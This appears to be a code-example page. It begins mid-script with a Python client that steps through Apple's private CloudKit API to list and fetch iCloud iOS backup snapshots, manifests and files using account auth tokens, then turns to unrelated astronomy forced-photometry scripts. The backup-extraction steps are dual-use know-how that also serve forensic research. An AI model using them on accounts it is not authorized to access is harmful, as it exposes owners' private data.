    zrr.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    zrr.zoneIdentifier.ownerIdentifier.type = 7

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header = {'X-MMe-Client-Info': Client_Info,
                       'X-Apple-Request-UUID': random_guid(),
                       'X-CloudKit-UserId': cloudkit_user_id,
                       'X-CloudKit-AuthToken': cloud_kit_token,
                       'X-CloudKit-ContainerId': 'com.apple.backup.ios',
                       'X-CloudKit-BundleId': 'com.apple.backupd',
                       'X-CloudKit-ProtocolVersion': 'client=1;comments=1;device=1;presence=1;records=1;sharing=1;subscriptions=1;users=1;mescal=1;',
                       'Accept': 'application/x-protobuf',
                       'Content-Type': 'application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true',
                       'User-Agent': USER_AGENT_UBD
                       # 'Cookie': cookie
                       }

    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    zone_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(zone_retrieve_response)


    ####################################################################################################################
    #STEP 5. Backup list
    #Returns device data/ backups.
    ####################################################################################################################
    debug('\nSTEP 5. Backup list.')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = 'BackupAccount'
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = 'mbksync'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    # What is this thing? Is it really an id associated with a particular backup?
    devices = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'devices'
    )
    if device_index >= len(devices.recordFieldValue):
        print 'No such device. Available devices: %s' % devices
        sys.exit(1)

    backup_id = devices.recordFieldValue[device_index].referenceValue.recordIdentifier.value.name


    ####################################################################################################################
    #STEP 6. Snapshot list (+ Keybag)
    # Message type 211 with the required backup uuid, protobuf array encoded.
    #          Returns device/ snapshots/ keybag information.
    #          Timestamps are hex encoded double offsets to 01 Jan 2001 00:00:00 GMT (Cocoa/ Webkit reference date).
    ####################################################################################################################
    debug('\nSTEP 6. Snapshot list (+ Keybag)')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = backup_id
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = 'mbksync'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    snapshots = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'snapshots'
    )

    if snapshot_index >= len(snapshots.recordFieldValue):
        print 'No such snapshot. Available snapshots: %s' % snapshots
        sys.exit(0)

    a_snapshot = snapshots.recordFieldValue[snapshot_index].referenceValue.recordIdentifier.value.name

    current_keybag_UUID = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'currentKeybagUUID'
    ).stringValue


    ####################################################################################################################
    # STEP 7. Manifest list.
    #
    #          Url/ headers as step 6.
    #          Message type 211 with the required snapshot uuid, protobuf array encoded.
    #          Returns system/ backup properties (bytes ? format ?? proto), quota information and manifest details.
    ####################################################################################################################
    debug('\nSTEP 7. Manifest list')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = a_snapshot
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = 'mbksync'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    manifest_ids = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'manifestIDs'
    )
    if manifest_index >= len(manifest_ids.recordFieldValue):
        print 'No such manifest. Available manifests: %s' % manifest_ids
    a_manifest_id = manifest_ids.recordFieldValue[manifest_index].stringValue


    ########################################################################################################################
    # STEP 8. Retrieve list of files.
    #
    #          Url/ headers as step 7.
    #          Message type 211 with the required manifest, protobuf array encoded.
    #          Returns system/ backup properties (bytes ? format ?? proto), quota information and manifest details.
    #
    #          Returns a rather somewhat familiar looking set of results but with encoded bytes.
    ########################################################################################################################
    debug('\nSTEP 8. Retrieve list of files.')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = a_manifest_id + ':0'
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = '_defaultZone'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    asset_tokens = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'files'
    )

    if asset_tokens is None:
        print 'No files found'
        sys.exit(0)

    # Right now just grabbing the first file.
    # InflatableDonkey looks for the first file that is non 0 length
    # an_asset_token = asset_tokens.recordFieldValue[0].referenceValue.recordIdentifier.value.name
    length = 0
    an_asset_token = None
    for record_field_value in asset_tokens.recordFieldValue:
        an_asset_token = record_field_value.referenceValue.recordIdentifier.value.name
        # F:UUID:token:length:x
        _, uuid, token, length, x = an_asset_token.split(':')
        if int(length) > 0: break
    if int(length) == 0:
        print 'All files are 0 length'
        sys.exit(0)


    ########################################################################################################################
    # STEP 9. Retrieve asset tokens.
    #
    #          Url/ headers as step 8.
    #          Message type 211 with the required file, protobuf array encoded.
    ########################################################################################################################
    debug('\nSTEP 9. Retrieve asset tokens.')

    requestOperation = retrieve_request(211)
    # recordRetrieveRequest
    rrr = requestOperation.recordRetrieveRequest
    rrr.recordID.value.name = an_asset_token
    rrr.recordID.value.type = 1
    rrr.recordID.zoneIdentifier.value.name = '_defaultZone'
    rrr.recordID.zoneIdentifier.value.type = 6
    rrr.recordID.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    rrr.recordID.zoneIdentifier.ownerIdentifier.type = 7
    rrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/record/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    value = find_records_with_identifier(
        record_retrieve_response.recordRetrieveResponse.record.recordField,
        'contents'
    )
    # I think these are file attributes
    try:
        asset_value = value.assetValue
    except AttributeError:
        print 'No asset token found.'
        sys.exit(0)


    ####################################################################################################################
    # STEP 10. AuthorizeGet.
    #
    #          Process somewhat different to iOS8.
    #
    #          New headers/ mmcs auth token. See AuthorizeGetRequestFactory for details.
    #          Returns a ChunkServer.FileGroup protobuf which is largely identical to iOS8
    ####################################################################################################################
    debug('\nSTEP 10. AuthorizeGet.')

    mmcsAuthToken = '%s %s %s' % (
        asset_value.fileChecksum.encode('hex'),
        asset_value.fileSignature.encode('hex'),
        asset_value.downloadToken
    )

    headers = {
        'Accept': 'application/vnd.com.apple.me.ubchunk+protobuf',
        'Content-Type': 'application/vnd.com.apple.me.ubchunk+protobuf',
        'x-apple-mmcs-dataclass': 'com.apple.Dataclass.CloudKit',
        'X-CloudKit-Container': 'com.apple.backup.ios',
        'X-CloudKit-Zone': '_defaultZone',
        'x-apple-mmcs-auth': mmcsAuthToken,
        'x-apple-mme-dsid': dsPrsID,
        'User-Agent': USER_AGENT_UBD,
        'x-apple-mmcs-proto-version': '4.0',
        'X-Mme-Client-Info': '<iPhone5,3> <iPhone OS;9.0.1;13A404> <com.apple.cloudkit.CloudKitDaemon/479 (com.apple.cloudd/479)>'
    }

    # The body is a protobuf object FileTokens
    file_tokens = FileTokens()
    file_token = file_tokens.fileTokens.add()
    file_token.fileChecksum = asset_value.fileChecksum
    file_token.token = asset_value.downloadToken
    file_token.fileSignature = asset_value.fileSignature

    body = file_tokens.SerializeToString()
    host = urlparse(asset_value.contentBaseURL).hostname
    url = '/' + dsPrsID + '/authorizeGet'
    pbuf_string = request(host, 'POST', url, body, headers)

    file_groups = FileGroups()
    file_groups.ParseFromString(pbuf_string)

    debug(file_groups)


    ####################################################################################################################
    # STEP 11. ChunkServer.FileGroups.
    #
    # TODO.
    ####################################################################################################################


    ####################################################################################################################
    # STEP 12. Assemble assets/ files.
    ####################################################################################################################
    debug('\nSTEP 12. Assemble assets/files.')

    requestOperation = retrieve_request(220)
    # recordRetrieveRequest
    qrr = requestOperation.queryRetrieveRequest
    record_type = qrr.query.type.add()
    record_type.name = 'PrivilegedBatchRecordFetch'
    query_filter = qrr.query.filter.add()
    query_filter.fieldName.name = '___recordID'
    query_filter.fieldValue.type = 5
    query_filter.fieldValue.referenceValue.recordIdentifier.value.name = 'K:' + current_keybag_UUID
    query_filter.fieldValue.referenceValue.recordIdentifier.value.type = 1
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.value.name = 'mbksync'
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.value.type = 6
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    query_filter.fieldValue.referenceValue.recordIdentifier.zoneIdentifier.ownerIdentifier.type = 7
    query_filter.type = 1

    qrr.zoneIdentifier.value.name = 'mbksync'
    qrr.zoneIdentifier.value.type = 6
    qrr.zoneIdentifier.ownerIdentifier.name = cloudkit_user_id
    qrr.zoneIdentifier.ownerIdentifier.type = 7
    qrr.f6.value = 1

    debug(requestOperation)
    body = encode_protobuf_array([requestOperation])
    cloudkit_header['X-Apple-Request-UUID'] = random_guid()
    pbuf_string = request(ckdatabase_host, 'POST', '/api/client/query/retrieve', body, cloudkit_header)
    record_retrieve_response = decode_protobuf_array(pbuf_string, ResponseOperation)[0]
    debug(record_retrieve_response)

    debug('Done')

Example 36

Project: tractor
Source File: scuss.py
View license
def main():
    import optparse

    parser = optparse.OptionParser('%prog [options]')
    parser.add_option('-o', dest='outfn', help='Output filename (FITS table)')
    parser.add_option('-i', dest='imgfn', help='Image input filename')
    parser.add_option('-f', dest='flagfn', help='Flags input filename')
    parser.add_option('-p', dest='psffn', help='PsfEx input filename')
    parser.add_option('-s', dest='postxt', help='Source positions input text file')
    parser.add_option('-S', dest='statsfn', help='Output image statistis filename (FITS table); optional')

    parser.add_option('-g', dest='gaussianpsf', action='store_true',
                      default=False,
                      help='Use multi-Gaussian approximation to PSF?')
    
    parser.add_option('-P', dest='plotbase', default='scuss',
                      help='Plot base filename (default: %default)')
    opt,args = parser.parse_args()

    # Check command-line arguments
    if len(args):
        print('Extra arguments:', args)
        parser.print_help()
        sys.exit(-1)
    for fn,name,exists in [(opt.outfn, 'output filename (-o)', False),
                           (opt.imgfn, 'image filename (-i)', True),
                           (opt.flagfn, 'flag filename (-f)', True),
                           (opt.psffn, 'PSF filename (-p)', True),
                           (opt.postxt, 'Source positions filename (-s)', True),
                           ]:
        if fn is None:
            print('Must specify', name)
            sys.exit(-1)
        if exists and not os.path.exists(fn):
            print('Input file', fn, 'does not exist')
            sys.exit(-1)

    # outfn = 'tractor-scuss.fits'
    # imstatsfn = 'tractor-scuss-imstats.fits'
    

    # Read inputs
    print('Reading input image', opt.imgfn)
    img = fitsio.read(opt.imgfn)
    print('Read img', img.shape, img.dtype)
    H,W = img.shape
    
    posfn = opt.postxt + '.fits'
    if not os.path.exists(posfn):
        from astrometry.util.fits import streaming_text_table
        hdr = 'ra dec x y objid sdss_psfmag_u sdss_psfmagerr_u'
        d = np.float64
        f = np.float32
        types = [str,str,d,d,str,f,f]
        print('Reading positions', opt.postxt)
        T = streaming_text_table(opt.postxt, headerline=hdr, coltypes=types)
        T.writeto(posfn)
        print('Wrote', posfn)

    print('Reading positions', posfn)
    T = fits_table(posfn)
    print('Read', len(T), 'source positions')
    
    print('Reading flags', opt.flagfn)
    flag = fitsio.read(opt.flagfn)
    print('Read flag', flag.shape, flag.dtype)

    print('Reading PSF', opt.psffn)
    psf = PsfEx(opt.psffn, W, H)

    if opt.gaussianpsf:
        picpsffn = opt.psffn + '.pickle'
        if not os.path.exists(picpsffn):
            psf.savesplinedata = True
            print('Fitting PSF model...')
            psf.ensureFit()
            pickle_to_file(psf.splinedata, picpsffn)
            print('Wrote', picpsffn)
        else:
            print('Reading PSF model parameters from', picpsffn)
            data = unpickle_from_file(picpsffn)
            print('Fitting PSF...')
            psf.fitSavedData(*data)
            
    print('Computing image sigma...')
    plo,phi = [np.percentile(img[flag == 0], p) for p in [25,75]]
    # Wikipedia says:  IRQ -> sigma:
    sigma = (phi - plo) / (0.6745 * 2)
    print('Sigma:', sigma)
    invvar = np.zeros_like(img) + (1./sigma**2)
    invvar[flag != 0] = 0.
    
    # Estimate sky level from median -- not actually necessary, since
    # we will fit it below...
    med = np.median(img[flag == 0])
    
    band = 'u'
    
    # We will break the image into cells for speed -- save the
    # original full-size inputs here.
    fullinvvar = invvar
    fullimg  = img
    fullflag = flag
    fullpsf  = psf
    fullT = T

    # We add a margin around each cell -- we want sources within the
    # cell, we need to include a margin of image pixels touched by
    # those sources, and also an additional margin of sources that
    # touch those pixels.
    margin = 10 # pixels
    # Number of cells to split the image into
    nx = 10
    ny = 10
    # cell positions
    XX = np.round(np.linspace(0, W, nx+1)).astype(int)
    YY = np.round(np.linspace(0, H, ny+1)).astype(int)
    
    results = []

    # Image statistics
    imstats = fits_table()
    imstats.xlo = np.zeros(((len(YY)-1)*(len(XX)-1)), int)
    imstats.xhi = np.zeros_like(imstats.xlo)
    imstats.ylo = np.zeros_like(imstats.xlo)
    imstats.yhi = np.zeros_like(imstats.xlo)
    imstats.ninbox = np.zeros_like(imstats.xlo)
    imstats.ntotal = np.zeros_like(imstats.xlo)
    imstatkeys = ['imchisq', 'imnpix', 'sky']
    for k in imstatkeys:
        imstats.set(k, np.zeros(len(imstats)))
    
    # Plots:
    ps = PlotSequence(opt.plotbase)
    
    # Loop over cells...
    celli = -1
    for yi,(ylo,yhi) in enumerate(zip(YY, YY[1:])):
        for xi,(xlo,xhi) in enumerate(zip(XX, XX[1:])):
            celli += 1
            imstats.xlo[celli] = xlo
            imstats.xhi[celli] = xhi
            imstats.ylo[celli] = ylo
            imstats.yhi[celli] = yhi
            print()
            print('Doing image cell %i: x=[%i,%i), y=[%i,%i)' % (celli, xlo,xhi,ylo,yhi))
            # We will fit for sources in the [xlo,xhi), [ylo,yhi) box.
            # We add a margin in the image around that ROI
            # Beyond that, we add a margin of extra sources
    
            # image region: [ix0,ix1)
            ix0 = max(0, xlo - margin)
            ix1 = min(W, xhi + margin)
            iy0 = max(0, ylo - margin)
            iy1 = min(H, yhi + margin)
            S = (slice(iy0, iy1), slice(ix0, ix1))

            img = fullimg[S]
            invvar = fullinvvar[S]

            if not opt.gaussianpsf:
                # Instantiate pixelized PSF at this cell center.
                pixpsf = fullpsf.instantiateAt((xlo+xhi)/2., (ylo+yhi)/2.)
                print('Pixpsf:', pixpsf.shape)
                psf = PixelizedPSF(pixpsf)
            else:
                psf = fullpsf
            psf = ShiftedPsf(fullpsf, ix0, iy0)
            
            # sources nearby
            x0 = max(0, xlo - margin*2)
            x1 = min(W, xhi + margin*2)
            y0 = max(0, ylo - margin*2)
            y1 = min(H, yhi + margin*2)
            
            # (SCUSS uses FITS pixel indexing, so -1)
            J = np.flatnonzero((fullT.x-1 >= x0) * (fullT.x-1 < x1) *
                               (fullT.y-1 >= y0) * (fullT.y-1 < y1))
            T = fullT[J].copy()
            T.row = J
    
            # Remember which sources are within the cell (not the margin)
            T.inbounds = ((T.x-1 >= xlo) * (T.x-1 < xhi) *
                          (T.y-1 >= ylo) * (T.y-1 < yhi))
            # Shift source positions so they are correct for this subimage (cell)
            T.x -= ix0
            T.y -= iy0
    
            imstats.ninbox[celli] = sum(T.inbounds)
            imstats.ntotal[celli] = len(T)
    
            # print 'Image subregion:', img.shape
            print('Number of sources in ROI:', sum(T.inbounds))
            print('Number of sources in ROI + margin:', len(T))
            #print 'Source positions: x', T.x.min(), T.x.max(), 'y', T.y.min(), T.y.max()

            # Create tractor.Image object
            tim = Image(data=img, invvar=invvar, psf=psf, wcs=NullWCS(),
                        sky=ConstantSky(med), photocal=LinearPhotoCal(1., band=band),
                        name=opt.imgfn, domask=False)
    
            # Create tractor catalog objects
            cat = []
            for i in range(len(T)):
                # -1: SCUSS, apparently, uses FITS pixel conventions.
                src = PointSource(PixPos(T.x[i] - 1, T.y[i] - 1),
                                  Fluxes(**{band:100.}))
                cat.append(src)

            # Create Tractor object.
            tractor = Tractor([tim], cat)

            # print 'All params:'
            # tractor.printThawedParams()
            t0 = Time()
            tractor.freezeParamsRecursive('*')
            tractor.thawPathsTo('sky')
            tractor.thawPathsTo(band)
            # print 'Fitting params:'
            # tractor.printThawedParams()

            # Forced photometry
            ims0,ims1,IV,fs = tractor.optimize_forced_photometry(
                minsb=1e-3*sigma, mindlnp=1., sky=True, minFlux=None, variance=True,
                fitstats=True, shared_params=False)
            
            print('Forced photometry took', Time()-t0)
            
            # print 'Fit params:'
            # tractor.printThawedParams()

            # Record results
            T.set('tractor_%s_counts' % band, np.array([src.getBrightness().getBand(band) for src in cat]))
            T.set('tractor_%s_counts_invvar' % band, IV)
            T.cell = np.zeros(len(T), int) + celli
            if fs is not None:
                # Per-source stats
                for k in ['prochi2', 'pronpix', 'profracflux', 'proflux', 'npix']:
                    T.set(k, getattr(fs, k))
                # Per-image stats
                for k in imstatkeys:
                    X = getattr(fs, k)
                    imstats.get(k)[celli] = X[0]
            results.append(T)

            # Make plots for the first N cells
            if celli >= 10:
                continue
    
            mod = tractor.getModelImage(0)
            ima = dict(interpolation='nearest', origin='lower',
                       vmin=med + -2. * sigma, vmax=med + 5. * sigma)
            plt.clf()
            plt.imshow(img, **ima)
            plt.title('Data')
            ps.savefig()
            
            plt.clf()
            plt.imshow(mod, **ima)
            plt.title('Model')
            ps.savefig()
            
            noise = np.random.normal(scale=sigma, size=img.shape)
            plt.clf()
            plt.imshow(mod + noise, **ima)
            plt.title('Model + noise')
            ps.savefig()
            
            chi = (img - mod) * tim.getInvError()
            plt.clf()
            plt.imshow(chi, interpolation='nearest', origin='lower', vmin=-5, vmax=5)
            plt.title('Chi')
            ps.savefig()
    

    # Merge results from the cells
    TT = merge_tables(results)
    # Cut to just the sources within the cells
    TT.cut(TT.inbounds)
    TT.delete_column('inbounds')
    # Sort them back into original order
    TT.cut(np.argsort(TT.row))
    #TT.delete_column('row')
    TT.writeto(opt.outfn)
    print('Wrote results to', opt.outfn)
    
    if opt.statsfn:
        imstats.writeto(opt.statsfn)
        print('Wrote image statistics to', opt.statsfn)

    plot_results(opt.outfn, ps)

Example 37

Project: tractor
Source File: scuss2.py
View license
def main():
    import optparse

    parser = optparse.OptionParser('%prog [options]')
    parser.add_option('-o', dest='outfn', help='Output filename (FITS table)')
    parser.add_option('-i', dest='imgfn', help='Image input filename')
    parser.add_option('-f', dest='flagfn', help='Flags input filename')
    parser.add_option('-z', dest='flagzero', help='Flag image: zero = 0', action='store_true')
    parser.add_option('-p', dest='psffn', help='PsfEx input filename')
    #parser.add_option('-s', dest='postxt', help='Source positions input text file')
    parser.add_option('-S', dest='statsfn', help='Output image statistis filename (FITS table); optional')

    parser.add_option('--sky', dest='fitsky', action='store_true',
                      help='Fit sky level as well as fluxes?')
    parser.add_option('--band', '-b', dest='band', default='r',
                      help='Which SDSS band to use for forced photometry profiles: default %default')

    parser.add_option('-g', dest='gaussianpsf', action='store_true',
                      default=False,
                      help='Use multi-Gaussian approximation to PSF?')
    
    parser.add_option('-P', dest='plotbase', default='scuss',
                      help='Plot base filename (default: %default)')
    parser.add_option('-l', dest='local', action='store_true', default=False,
                      help='Use local SDSS tree?')

    # TESTING
    parser.add_option('--sub', dest='sub', action='store_true',
                      help='Cut to small sub-image for testing')
    parser.add_option('--res', dest='res', action='store_true',
                      help='Just plot results from previous run')

    opt,args = parser.parse_args()

    # Check command-line arguments
    if len(args):
        print('Extra arguments:', args)
        parser.print_help()
        sys.exit(-1)
    for fn,name,exists in [(opt.outfn, 'output filename (-o)', False),
                           (opt.imgfn, 'image filename (-i)', True),
                           (opt.flagfn, 'flag filename (-f)', True),
                           (opt.psffn, 'PSF filename (-p)', True),
                           #(opt.postxt, 'Source positions filename (-s)', True),
                           ]:
        if fn is None:
            print('Must specify', name)
            sys.exit(-1)
        if exists and not os.path.exists(fn):
            print('Input file', fn, 'does not exist')
            sys.exit(-1)

    lvl = logging.DEBUG
    logging.basicConfig(level=lvl, format='%(message)s', stream=sys.stdout)

    if opt.res:
        ps = PlotSequence(opt.plotbase)
        plot_results(opt.outfn, ps)
        sys.exit(0)

    sdss = DR9(basedir='.')#data/unzip')
    if opt.local:
        sdss.useLocalTree(pobj='photoObjs-new')
        sdss.saveUnzippedFiles('data/unzip')

    # Read inputs
    print('Reading input image', opt.imgfn)
    img,hdr = fitsio.read(opt.imgfn, header=True)
    print('Read img', img.shape, img.dtype)
    H,W = img.shape
    img = img.astype(np.float32)

    sky = hdr['SKYADU']
    print('Sky:', sky)

    cal = hdr['CALIA73']
    print('Zeropoint cal:', cal)
    zpscale = 10.**((2.5 + cal) / 2.5)
    print('Zp scale', zpscale)
    
    wcs = anwcs(opt.imgfn)
    print('WCS pixel scale:', wcs.pixel_scale())
    
    print('Reading flags', opt.flagfn)
    flag = fitsio.read(opt.flagfn)
    print('Read flag', flag.shape, flag.dtype)

    imslice = None
    if opt.sub:
        imslice = (slice(0, 800), slice(0, 800))
    if imslice is not None:
        img = img[imslice]
        H,W = img.shape
        flag = flag[imslice]
        wcs.set_width(W)
        wcs.set_height(H)

    print('Reading PSF', opt.psffn)
    psf = PsfEx(opt.psffn, W, H)

    if opt.gaussianpsf:
        picpsffn = opt.psffn + '.pickle'
        if not os.path.exists(picpsffn):
            psf.savesplinedata = True
            print('Fitting PSF model...')
            psf.ensureFit()
            pickle_to_file(psf.splinedata, picpsffn)
            print('Wrote', picpsffn)
        else:
            print('Reading PSF model parameters from', picpsffn)
            data = unpickle_from_file(picpsffn)
            print('Fitting PSF...')
            psf.fitSavedData(*data)

    #
    x = psf.instantiateAt(0., 0.)
    print('PSF', x.shape)
    x = x.shape[0]
    #psf.radius = (x+1)/2.
    psf.radius = 20
    
    print('Computing image sigma...')
    if opt.flagzero:
        bad = np.flatnonzero((flag == 0))
        good = (flag != 0)
    else:
        bad = np.flatnonzero((flag != 0))
        good = (flag == 0)

    igood = img[good]
    #plo,med,phi = [percentile_f(igood, p) for p in [25, 50, 75]]
    #sky = med
    plo,phi = [percentile_f(igood, p) for p in [25, 75]]
    # Wikipedia says:  IRQ -> sigma:
    sigma = (phi - plo) / (0.6745 * 2)
    print('Sigma:', sigma)
    invvar = np.zeros_like(img) + (1./sigma**2)
    invvar.flat[bad] = 0.
    del bad
    del good
    del igood
    
    band = 'u'

    # Get SDSS sources within the image...

    print('Reading SDSS objects...')
    cols = ['objid', 'ra', 'dec', 'fracdev', 'objc_type',
            'theta_dev', 'theta_deverr', 'ab_dev', 'ab_deverr', 'phi_dev_deg',
            'theta_exp', 'theta_experr', 'ab_exp', 'ab_experr', 'phi_exp_deg',
            'devflux', 'expflux',
            'resolve_status', 'nchild', 'flags', 'objc_flags',
            'run','camcol','field','id',
            'psfflux', 'psfflux_ivar', 'cmodelflux', 'cmodelflux_ivar',
            'modelflux', 'modelflux_ivar',
            'extinction']
    T = read_photoobjs_in_wcs(wcs, 1./60., sdss=sdss, cols=cols)
    print('Got', len(T), 'SDSS objs')

    T.treated_as_pointsource = treat_as_pointsource(T, band_index(opt.band))

    ok,T.x,T.y = wcs.radec2pixelxy(T.ra, T.dec)
    
    # We will break the image into cells for speed -- save the
    # original full-size inputs here.
    fullinvvar = invvar
    fullimg  = img
    fullpsf  = psf
    fullT = T

    # We add a margin around each cell -- we want sources within the
    # cell, we need to include a margin of image pixels touched by
    # those sources, and also an additional margin of sources that
    # touch those pixels.
    margin = 10 # pixels

    # Number of cells to split the image into
    imh,imw = img.shape
    nx = int(np.round(imw / 400.))
    ny = int(np.round(imh / 400.))
    #nx = ny = 20
    #nx = ny = 1

    # cell positions
    XX = np.round(np.linspace(0, W, nx+1)).astype(int)
    YY = np.round(np.linspace(0, H, ny+1)).astype(int)
    
    results = []

    # Image statistics
    imstats = fits_table()
    imstats.xlo = np.zeros(((len(YY)-1)*(len(XX)-1)), int)
    imstats.xhi = np.zeros_like(imstats.xlo)
    imstats.ylo = np.zeros_like(imstats.xlo)
    imstats.yhi = np.zeros_like(imstats.xlo)
    imstats.ninbox = np.zeros_like(imstats.xlo)
    imstats.ntotal = np.zeros_like(imstats.xlo)
    imstatkeys = ['imchisq', 'imnpix', 'sky']
    for k in imstatkeys:
        imstats.set(k, np.zeros(len(imstats)))
    
    # Plots:
    ps = PlotSequence(opt.plotbase)
    
    # Loop over cells...
    celli = -1
    for yi,(ylo,yhi) in enumerate(zip(YY, YY[1:])):
        for xi,(xlo,xhi) in enumerate(zip(XX, XX[1:])):
            celli += 1
            imstats.xlo[celli] = xlo
            imstats.xhi[celli] = xhi
            imstats.ylo[celli] = ylo
            imstats.yhi[celli] = yhi
            print()
            print('Doing image cell %i: x=[%i,%i), y=[%i,%i)' % (celli, xlo,xhi,ylo,yhi))
            # We will fit for sources in the [xlo,xhi), [ylo,yhi) box.
            # We add a margin in the image around that ROI
            # Beyond that, we add a margin of extra sources
    
            # image region: [ix0,ix1)
            ix0 = max(0, xlo - margin)
            ix1 = min(W, xhi + margin)
            iy0 = max(0, ylo - margin)
            iy1 = min(H, yhi + margin)
            S = (slice(iy0, iy1), slice(ix0, ix1))

            img = fullimg[S]
            invvar = fullinvvar[S]

            if not opt.gaussianpsf:
                # Instantiate pixelized PSF at this cell center.
                pixpsf = fullpsf.instantiateAt((xlo+xhi)/2., (ylo+yhi)/2.)
                print('Pixpsf:', pixpsf.shape)
                psf = PixelizedPSF(pixpsf)
            else:
                psf = fullpsf
            psf = ShiftedPsf(fullpsf, ix0, iy0)
            
            # sources nearby
            x0 = max(0, xlo - margin*2)
            x1 = min(W, xhi + margin*2)
            y0 = max(0, ylo - margin*2)
            y1 = min(H, yhi + margin*2)
            
            # FITS pixel indexing, so -1
            J = np.flatnonzero((fullT.x-1 >= x0) * (fullT.x-1 < x1) *
                               (fullT.y-1 >= y0) * (fullT.y-1 < y1))
            T = fullT[J].copy()
            T.row = J
    
            # Remember which sources are within the cell (not the margin)
            T.inbounds = ((T.x-1 >= xlo) * (T.x-1 < xhi) *
                          (T.y-1 >= ylo) * (T.y-1 < yhi))

            # Shift source positions so they are correct for this subimage (cell)
            #T.x -= ix0
            #T.y -= iy0
    
            imstats.ninbox[celli] = sum(T.inbounds)
            imstats.ntotal[celli] = len(T)
    
            # print 'Image subregion:', img.shape
            print('Number of sources in ROI:', sum(T.inbounds))
            print('Number of sources in ROI + margin:', len(T))
            #print 'Source positions: x', T.x.min(), T.x.max(), 'y', T.y.min(), T.y.max()

            twcs = WcslibWcs(None, wcs=wcs)
            twcs.setX0Y0(ix0, iy0)

            # Create tractor.Image object
            tim = Image(data=img, invvar=invvar, psf=psf, wcs=twcs,
                        sky=ConstantSky(sky),
                        photocal=LinearPhotoCal(zpscale, band=band),
                        name=opt.imgfn, domask=False)
    
            # Create tractor catalog objects
            cat,catI = get_tractor_sources_dr9(
                None, None, None, bandname=opt.band,
                sdss=sdss, objs=T.copy(), bands=[band],
                nanomaggies=True, fixedComposites=True, useObjcType=True,
                getobjinds=True)
            print('Got', len(cat), 'Tractor sources')

            assert(len(cat) == len(catI))

            # for r,d,src in zip(T.ra[catI], T.dec[catI], cat):
            #     print 'Source', src.getPosition()
            #     print '    vs', r, d
            
            # Create Tractor object.
            tractor = Tractor([tim], cat)

            # print 'All params:'
            # tractor.printThawedParams()
            t0 = Time()
            tractor.freezeParamsRecursive('*')
            tractor.thawPathsTo(band)
            if opt.fitsky:
                tractor.thawPathsTo('sky')
